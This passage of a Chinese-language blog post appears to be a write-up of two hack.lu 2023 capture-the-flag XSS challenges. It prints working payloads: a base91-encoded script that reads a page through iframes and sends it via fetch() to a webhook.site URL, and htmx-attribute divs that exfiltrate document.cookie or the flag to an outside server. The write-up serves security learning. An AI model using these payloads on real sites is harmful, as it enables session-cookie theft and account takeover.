    self<span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"body"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"appendChild"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>f1<span class="token punctuation">)</span><span class="token punctuation">;</span>\
<span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span><span class="token number">11</span>\
'<span class="token punctuation">)</span>
<span class="token comment" spellcheck="true"># print(data)</span>
hex_data <span class="token operator">=</span> binascii<span class="token punctuation">.</span>hexlify<span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"payload："</span><span class="token operator">+</span>hex_data<span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"base91编码后："</span><span class="token operator">+</span>timu<span class="token punctuation">(</span>hex_data<span class="token punctuation">)</span><span class="token punctuation">)</span>

payload：f0afecd5baf36d2fe35f5153e7a98a43c1b6fdb60276742755ad32a0627856d0ca0402f620f064a525686588df5f5153e75f6b06ece8feef4301f625f0087c7f454d9d7fad19b0a34b3aa7669636c0d8fd860f381b8b7f454d9d7fad19b0a33ba90277ad4c200bb3533811b03f8155ce0e422b1308d89f406595199e15b432818760dee8ada504ad007b1088013e74affe045e2b1808d8a156e5b6562aeb09ac7276105a9940c0fe04963dae74ad561a68db6f2be0088663688fb37180edda5aa9ac27306a02f627b0ee6980b1bb4947689ebcacad95ca7a02a326607f020b5c974b5380dd038f6e70efb7ad95ca7a02a326607f02a99c09dc6fffe7bf553917b0a3a72a0e05dbf6db0ad8d17557075c69a06dbf45bfe398d27cdf32e16c1ce008f67fc7698851350ef0a16bf527f0bf452b54714512c07d9dac4294fccd80c12908bc148d3253a8d2e8a83cd74f906b9a860fbd81ba1f910cb50dff5c3f9b2ddb7c409510cfe80cac84111491d93050457600fb18f17a36def1d90cc61ce91c3722eb36c44bab5d076c6ba5b29ec02a6707a1950904ec4fe0941b8f80fd096c75d3ca4ef5aea4b6018ee0a8d9ae03b6b552594f6095b383d0ca0402f62770ca8d47c0fe04b6ba6965a77a5752db0047b0bd6cd73f1a4405311458326b
base91编码后：<span class="token operator">&lt;</span>script<span class="token operator">></span>f1<span class="token operator">=</span>self<span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"createElement"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"iframe"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>self<span class="token punctuation">[</span><span class="token string">"f1"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"src"</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token string">"/"</span><span class="token punctuation">;</span>self<span class="token punctuation">[</span><span class="token string">"f1"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"onload"</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token operator">></span><span class="token punctuation">{</span>i<span class="token operator">=</span>self<span class="token punctuation">[</span><span class="token string">"f1"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"contentWindow"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"getElementsByTagName"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"a"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"text"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>f2<span class="token operator">=</span>self<span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"createElement"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"iframe"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>self<span class="token punctuation">[</span><span class="token string">"f2"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"src"</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token string">"/e/"</span><span class="token operator">+</span>i<span class="token punctuation">;</span>self<span class="token punctuation">[</span><span class="token string">"f2"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"onload"</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token operator">></span><span class="token punctuation">{</span>f<span class="token operator">=</span>self<span class="token punctuation">[</span><span class="token string">"f2"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"contentWindow"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"getElementsByClassName"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"subtitle"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"innerHTML"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>fetch<span class="token punctuation">(</span>atob<span class="token punctuation">(</span><span class="token string">"aHR0cHM6Ly93ZWJob29rLnNpdGUvZTU4ZWZmYTgtZDlkOS00OGEwLTk4ZjItMjJhOTYyOTYxYzIyLw=="</span><span class="token punctuation">)</span><span class="token operator">+</span>f<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token punctuation">}</span><span class="token punctuation">;</span>self<span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"body"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"appendChild"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>f2<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token punctuation">}</span><span class="token punctuation">;</span>self<span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"body"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"appendChild"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>f1<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span><span class="token number">11</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h5 id="get-flag"><a href="#get-flag" class="headerlink" title="get flag"></a>get flag</h5><p>把<code>payload</code>提上去，给<code>admin</code>举报就行了。</p>
<p><img src="http://114.67.236.137/pic/1697524432906.png" alt="1697524432906"></p>
<p>后来我发现<code>/e/</code>这个路由压根就没有鉴权机制，所以根本不用开两个<code>iframe</code>。直接一个<code>frame</code>获取<code>noteid</code>，然后访问这个<code>note</code>就可以了操。</p>
<pre class="line-numbers language-python"><code class="language-python">data <span class="token operator">=</span> based91<span class="token punctuation">.</span>decode<span class="token punctuation">(</span>'<span class="token operator">&lt;</span>script<span class="token operator">></span>\
f1<span class="token operator">=</span>self<span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"createElement"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"iframe"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>\
    self<span class="token punctuation">[</span><span class="token string">"f1"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"src"</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token string">"/"</span><span class="token punctuation">;</span>\
    self<span class="token punctuation">[</span><span class="token string">"f1"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"onload"</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token operator">></span><span class="token punctuation">{</span>\
        i<span class="token operator">=</span>self<span class="token punctuation">[</span><span class="token string">"f1"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"contentWindow"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"getElementsByTagName"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"a"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"text"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>\
        fetch<span class="token punctuation">(</span>atob<span class="token punctuation">(</span><span class="token string">"aHR0cHM6Ly93ZWJob29rLnNpdGUvZTU4ZWZmYTgtZDlkOS00OGEwLTk4ZjItMjJhOTYyOTYxYzIyLw=="</span><span class="token punctuation">)</span><span class="token operator">+</span>i<span class="token punctuation">)</span><span class="token punctuation">;</span>\
    <span class="token punctuation">}</span><span class="token punctuation">;</span>\
    self<span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"body"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"appendChild"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>f1<span class="token punctuation">)</span><span class="token punctuation">;</span>\
<span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span><span class="token number">11</span>\
'<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="http://114.67.236.137/pic/1697524680159.png" alt="1697524680159"></p>
<h4 id="Awesomenotes-I"><a href="#Awesomenotes-I" class="headerlink" title="Awesomenotes I"></a>Awesomenotes I</h4><p>这题感觉比前面那道简单多了，最起码这道题一个小时内做完了。但是考的东西比较新颖。</p>
<p>也是<code>note</code>题。有用的就俩函数。<code>/get_note</code>说明如果是<code>admin</code>的话就能拿到<code>flag</code>，这个<code>cookie</code>是在环境变量里的，所以根本没法伪造，她也不会给用户<code>cookie</code>。</p>
<pre class="line-numbers language-ruby"><code class="language-ruby">async fn <span class="token function">get_note</span><span class="token punctuation">(</span>
    <span class="token function">Path</span><span class="token punctuation">(</span>note<span class="token punctuation">)</span><span class="token punctuation">:</span> <span class="token constant">Path</span><span class="token operator">&lt;</span><span class="token builtin">String</span><span class="token operator">></span><span class="token punctuation">,</span>
    <span class="token function">TypedHeader</span><span class="token punctuation">(</span>cookie<span class="token punctuation">)</span><span class="token punctuation">:</span> <span class="token constant">TypedHeader</span><span class="token operator">&lt;</span><span class="token constant">Cookie</span><span class="token operator">></span><span class="token punctuation">,</span>
<span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> <span class="token constant">Result</span><span class="token operator">&lt;</span><span class="token constant">Html</span><span class="token operator">&lt;</span><span class="token builtin">String</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token constant">StatusCode</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>'static str<span class="token punctuation">)</span><span class="token operator">></span> <span class="token punctuation">{</span>
    <span class="token keyword">if</span> <span class="token operator">&amp;</span>note <span class="token operator">==</span> <span class="token string">"flag"</span> <span class="token punctuation">{</span>
        let <span class="token function">Some</span><span class="token punctuation">(</span>name<span class="token punctuation">)</span> <span class="token operator">=</span> cookie<span class="token punctuation">.</span><span class="token function">get</span><span class="token punctuation">(</span><span class="token string">"session"</span><span class="token punctuation">)</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
            <span class="token keyword">return</span> <span class="token function">Err</span><span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token constant">StatusCode</span><span class="token punctuation">:</span><span class="token symbol">:UNAUTHORIZED</span><span class="token punctuation">,</span> <span class="token string">"Missing session cookie"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span> name <span class="token operator">!=</span> std<span class="token punctuation">:</span><span class="token symbol">:env</span><span class="token punctuation">:</span><span class="token symbol">:var</span><span class="token punctuation">(</span><span class="token string">"ADMIN_SESSION"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">expect</span><span class="token punctuation">(</span><span class="token string">"Missing ADMIN_SESSION"</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token keyword">return</span> <span class="token function">Err</span><span class="token punctuation">(</span><span class="token punctuation">(</span>
                <span class="token constant">StatusCode</span><span class="token punctuation">:</span><span class="token symbol">:UNAUTHORIZED</span><span class="token punctuation">,</span>
                <span class="token string">"You are not allowed to read this note"</span><span class="token punctuation">,</span>
            <span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
        <span class="token keyword">return</span> <span class="token function">Ok</span><span class="token punctuation">(</span><span class="token function">Html</span><span class="token punctuation">(</span>fs<span class="token punctuation">:</span><span class="token symbol">:read_to_string</span><span class="token punctuation">(</span><span class="token string">"flag.txt"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">expect</span><span class="token punctuation">(</span><span class="token string">"Flag missing"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">if</span> note<span class="token punctuation">.</span><span class="token function">chars</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">any</span><span class="token punctuation">(</span><span class="token operator">|</span>c<span class="token operator">|</span> <span class="token operator">!</span>c<span class="token punctuation">.</span><span class="token function">is_ascii_hexdigit</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> <span class="token function">Err</span><span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token constant">StatusCode</span><span class="token punctuation">:</span><span class="token symbol">:BAD_REQUEST</span><span class="token punctuation">,</span> <span class="token string">"Malformed note ID"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    let <span class="token function">Ok</span><span class="token punctuation">(</span>note<span class="token punctuation">)</span> <span class="token operator">=</span> fs<span class="token punctuation">:</span><span class="token symbol">:read_to_string</span><span class="token punctuation">(</span>format<span class="token operator">!</span><span class="token punctuation">(</span><span class="token string">"public/upload/{:}"</span><span class="token punctuation">,</span> note<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> <span class="token function">Err</span><span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token constant">StatusCode</span><span class="token punctuation">:</span><span class="token symbol">:NOT_FOUND</span><span class="token punctuation">,</span> <span class="token string">"Note not found"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span><span class="token punctuation">;</span>
    <span class="token function">Ok</span><span class="token punctuation">(</span><span class="token function">Html</span><span class="token punctuation">(</span>note<span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><code>/upload_note</code>最关键的就是<code>waf</code>，只让上传<code>h1 p div</code>这三个标签，这三个标签正常来说是没法<code>xss</code>的。</p>
<pre class="line-numbers language-ruby"><code class="language-ruby">async fn <span class="token function">upload_note</span><span class="token punctuation">(</span>
    mut multipart<span class="token punctuation">:</span> <span class="token constant">Multipart</span><span class="token punctuation">,</span>
<span class="token punctuation">)</span> <span class="token operator">-</span><span class="token operator">></span> <span class="token punctuation">(</span><span class="token constant">StatusCode</span><span class="token punctuation">,</span> <span class="token constant">Result</span><span class="token operator">&lt;</span><span class="token constant">HeaderMap</span><span class="token operator">&lt;</span><span class="token constant">HeaderValue</span><span class="token operator">></span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>'static str<span class="token operator">></span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    let mut body<span class="token punctuation">:</span> <span class="token constant">Option</span><span class="token operator">&lt;</span><span class="token builtin">String</span><span class="token operator">></span> <span class="token operator">=</span> <span class="token constant">None</span><span class="token punctuation">;</span>
    <span class="token keyword">while</span> let <span class="token function">Some</span><span class="token punctuation">(</span>field<span class="token punctuation">)</span> <span class="token operator">=</span> multipart<span class="token punctuation">.</span><span class="token function">next_field</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>await<span class="token punctuation">.</span><span class="token function">unwrap</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        let <span class="token function">Some</span><span class="token punctuation">(</span>name<span class="token punctuation">)</span> <span class="token operator">=</span> field<span class="token punctuation">.</span><span class="token function">name</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">else</span> <span class="token punctuation">{</span> continue <span class="token punctuation">}</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span> name <span class="token operator">!=</span> <span class="token string">"note"</span> <span class="token punctuation">{</span>
            continue<span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
        let <span class="token function">Ok</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span> <span class="token operator">=</span> field<span class="token punctuation">.</span><span class="token function">text</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>await <span class="token keyword">else</span> <span class="token punctuation">{</span>
            continue<span class="token punctuation">;</span>
        <span class="token punctuation">}</span><span class="token punctuation">;</span>
        body <span class="token operator">=</span> <span class="token function">Some</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">break</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    let <span class="token function">Some</span><span class="token punctuation">(</span>body<span class="token punctuation">)</span> <span class="token operator">=</span> body <span class="token keyword">else</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> <span class="token punctuation">(</span><span class="token constant">StatusCode</span><span class="token punctuation">:</span><span class="token symbol">:BAD_REQUEST</span><span class="token punctuation">,</span> <span class="token function">Err</span><span class="token punctuation">(</span><span class="token string">"Malformed formdata"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> body<span class="token punctuation">.</span><span class="token function">len</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">></span> <span class="token number">5000</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> <span class="token punctuation">(</span><span class="token constant">StatusCode</span><span class="token punctuation">:</span><span class="token symbol">:PAYLOAD_TOO_LARGE</span><span class="token punctuation">,</span> <span class="token function">Err</span><span class="token punctuation">(</span><span class="token string">"Note too big"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    let safe <span class="token operator">=</span> ammonia<span class="token punctuation">:</span><span class="token symbol">:Builder</span><span class="token punctuation">:</span><span class="token symbol">:new</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token punctuation">.</span><span class="token function">tags</span><span class="token punctuation">(</span>hashset<span class="token operator">!</span><span class="token punctuation">[</span><span class="token string">"h1"</span><span class="token punctuation">,</span> <span class="token string">"p"</span><span class="token punctuation">,</span> <span class="token string">"div"</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
        <span class="token punctuation">.</span><span class="token function">add_generic_attribute_prefixes</span><span class="token punctuation">(</span><span class="token operator">&amp;</span><span class="token punctuation">[</span><span class="token string">"hx-"</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
        <span class="token punctuation">.</span><span class="token function">clean</span><span class="token punctuation">(</span><span class="token operator">&amp;</span>body<span class="token punctuation">)</span>
        <span class="token punctuation">.</span><span class="token function">to_string</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    let mut name <span class="token operator">=</span> <span class="token punctuation">[</span>0u8<span class="token punctuation">;</span> <span class="token number">32</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    fs<span class="token punctuation">:</span><span class="token symbol">:File</span><span class="token punctuation">:</span><span class="token symbol">:open</span><span class="token punctuation">(</span><span class="token string">"/dev/urandom"</span><span class="token punctuation">)</span>
        <span class="token punctuation">.</span><span class="token function">unwrap</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token punctuation">.</span><span class="token function">read_exact</span><span class="token punctuation">(</span><span class="token operator">&amp;</span>mut name<span class="token punctuation">)</span>
        <span class="token punctuation">.</span><span class="token function">expect</span><span class="token punctuation">(</span><span class="token string">"Failed to read urandom"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    let name <span class="token operator">=</span> <span class="token builtin">String</span><span class="token punctuation">:</span><span class="token symbol">:from_iter</span><span class="token punctuation">(</span>name<span class="token punctuation">.</span><span class="token function">map</span><span class="token punctuation">(</span><span class="token operator">|</span>c<span class="token operator">|</span> format<span class="token operator">!</span><span class="token punctuation">(</span><span class="token string">"{:02x}"</span><span class="token punctuation">,</span> c<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    fs<span class="token punctuation">:</span><span class="token symbol">:write</span><span class="token punctuation">(</span>format<span class="token operator">!</span><span class="token punctuation">(</span><span class="token string">"public/upload/{:}"</span><span class="token punctuation">,</span> name<span class="token punctuation">)</span><span class="token punctuation">,</span> safe<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">expect</span><span class="token punctuation">(</span><span class="token string">"Failed to write note"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">(</span>
        <span class="token constant">StatusCode</span><span class="token punctuation">:</span><span class="token symbol">:FOUND</span><span class="token punctuation">,</span>
        <span class="token function">Ok</span><span class="token punctuation">(</span><span class="token constant">HeaderMap</span><span class="token punctuation">:</span><span class="token symbol">:from_iter</span><span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token punctuation">(</span>
            <span class="token constant">LOCATION</span><span class="token punctuation">,</span>
            format<span class="token operator">!</span><span class="token punctuation">(</span><span class="token string">"/note/{:}"</span><span class="token punctuation">,</span> name<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">parse</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">unwrap</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
    <span class="token punctuation">)</span>
<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>但这句话就很奇怪，允许一个<code>hx-</code>开头的属性。这属性我这辈子都没见过。</p>
<pre><code>.add_generic_attribute_prefixes(&amp;[&quot;hx-&quot;])
</code></pre>
<p>经百度得知这个属性是<code>htmx</code>的东西，然后我看了一下<code>html</code>，发现好多页面都引入了<code>htmx</code>。</p>
<pre class="line-numbers language-html"><code class="language-html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span> <span class="token attr-name">src</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>https://unpkg.com/htmx.org@1.9.5<span class="token punctuation">"</span></span> <span class="token attr-name">integrity</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>sha384-xcuj3WpfgjlKF+FXhSQFQ0ZNr39ln+hwjN3npfM9VBnUskLolQAcN80McRIVOPuO<span class="token punctuation">"</span></span> <span class="token attr-name">crossorigin</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>anonymous<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token script language-javascript"></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><code>htmx</code>是啥:</p>
<blockquote>
<p>先来看<code>HTML</code>，<code>HTML</code>的优势在于，它是一个声明式的语言，我们可以直接在html中声明我们想要的效果，而不需要去写js代码，这样就可以减少很多的代码量，同时也可以减少很多的bug。而且，html是一个很简单的语言，很多人都可以很快的上手，这样也可以减少很多的学习成本</p>
</blockquote>
<p>大概就是标签就能执行<code>js</code>了，所以<a target="_blank" rel="noopener" href="https://htmx.org/reference/">读文档</a>就可以了。<code>htmx:afterRequest</code>后面写<code>js</code>就行，但是需要指定<code>hx-target</code>和<code>hx-trigger</code>。</p>
<p><code>dnslog</code>发现了一个更好用的<a target="_blank" rel="noopener" href="https://webhook.site/">webhook</a>，支持<code>https</code>。</p>
<pre><code>&lt;div hx-get=&quot;https://awesomenotes.online/&quot; hx-trigger=&quot;load&quot; hx-target=&quot;this&quot;  hx-on=&quot;htmx:afterRequest: fetch(&#39;https://webhook.site/e58effa8-d9d9-48a0-98f2-22a962961c22?a=&#39;+document.cookie)&quot;&gt;Fuck you&lt;/div&gt;
</code></pre>
<p>由于cookie没有设置<code>http only</code>，直接偷<code>cookie</code>就行，拿着<code>cookie</code>访问即可得到<code>flag</code>。</p>
<p>搜到一个<code>payload</code>，貌似不太稳定的样子</p>
<pre class="line-numbers language-html"><code class="language-html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> 
    <span class="token attr-name">hx-get</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>/api/note/flag?t<span class="token punctuation">=</span><span class="token punctuation">"</span></span> 
    <span class="token attr-name">hx-trigger</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>load delay:0.001s<span class="token punctuation">"</span></span>
    <span class="token attr-name">hx-target</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>#report<span class="token punctuation">"</span></span>
<span class="token punctuation">></span></span>
    get flag
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> 
    <span class="token attr-name">hx-get</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>YOUR_SERVER<span class="token punctuation">"</span></span> 
    <span class="token attr-name"><span class="token namespace">hx-on:</span>:config-request</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>event.detail.parameters[<span class="token punctuation">'</span>flag<span class="token punctuation">'</span>] <span class="token punctuation">=</span> document.getElementById(<span class="token punctuation">'</span>report<span class="token punctuation">'</span>).innerHTML<span class="token punctuation">"</span></span>
    <span class="token attr-name">hx-trigger</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>load delay:0.8s<span class="token punctuation">"</span></span>
    <span class="token attr-name">hx-target</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>#report<span class="token punctuation">"</span></span>
<span class="token punctuation">></span></span>
    send flag
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</article><!-- lincense--><div class="license-wrapper"><p> <span>Author:  </span><a href="http://www.squirt1e.top">Squirt1e</a></p><p> <span>Link:  </span><a href="http://www.squirt1e.top/2023/10/31/hacklu-liang-dao-xss/">http://www.squirt1e.top/2023/10/31/hacklu-liang-dao-xss/</a></p><p> <span>Copyright:  </span><span>All articles in this blog are licensed under <a rel="license noopener" target="_blank" href="https://creativecommons.org/licenses/by-nc-nd/3.0">CC BY-NC-SA 3.0</a> unless stating additionally.</span></p></div><div class="post-paginator"><a class="prevSlogan" href="/2023/11/22/secure-system/" title="香山杯决赛Secure System复现"><span>< PreviousPost</span><br><span class="prevTitle">香山杯决赛Secure System复现</span></a><a class="nextSlogan" href="/2023/10/31/actf-web/" title="ACTF2023-web题解"><span>NextPost ></span><br><span class="nextTitle">ACTF2023-web题解</span></a><div class="clear"></div></div><div id="comment"></div></section></article><footer id="cxo-footer-outer"><div id="cxo-footer-inner"><p class="footer-container"><span>Site by </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span> | theme </span><a target="_blank" rel="noopener" href="https://github.com/Longlongyu/hexo-theme-Cxo"><span>Cxo</span></a></p></div></footer><!-- catelog--><div class="toc-wrapper" style="top: 70vh;"><div class="toc-catalog"><i class="fa fa-list"> </i><span>CATALOG</span></div><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#Based-Encoding"><span class="toc-number">1.</span> <span class="toc-text">Based Encoding</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#step1-Lead-to-XSS"><span class="toc-number">1.1.</span> <span class="toc-text">step1 Lead to XSS</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#step2-bypass-base91-alphabet"><span class="toc-number">1.2.</span> <span class="toc-text">step2 bypass 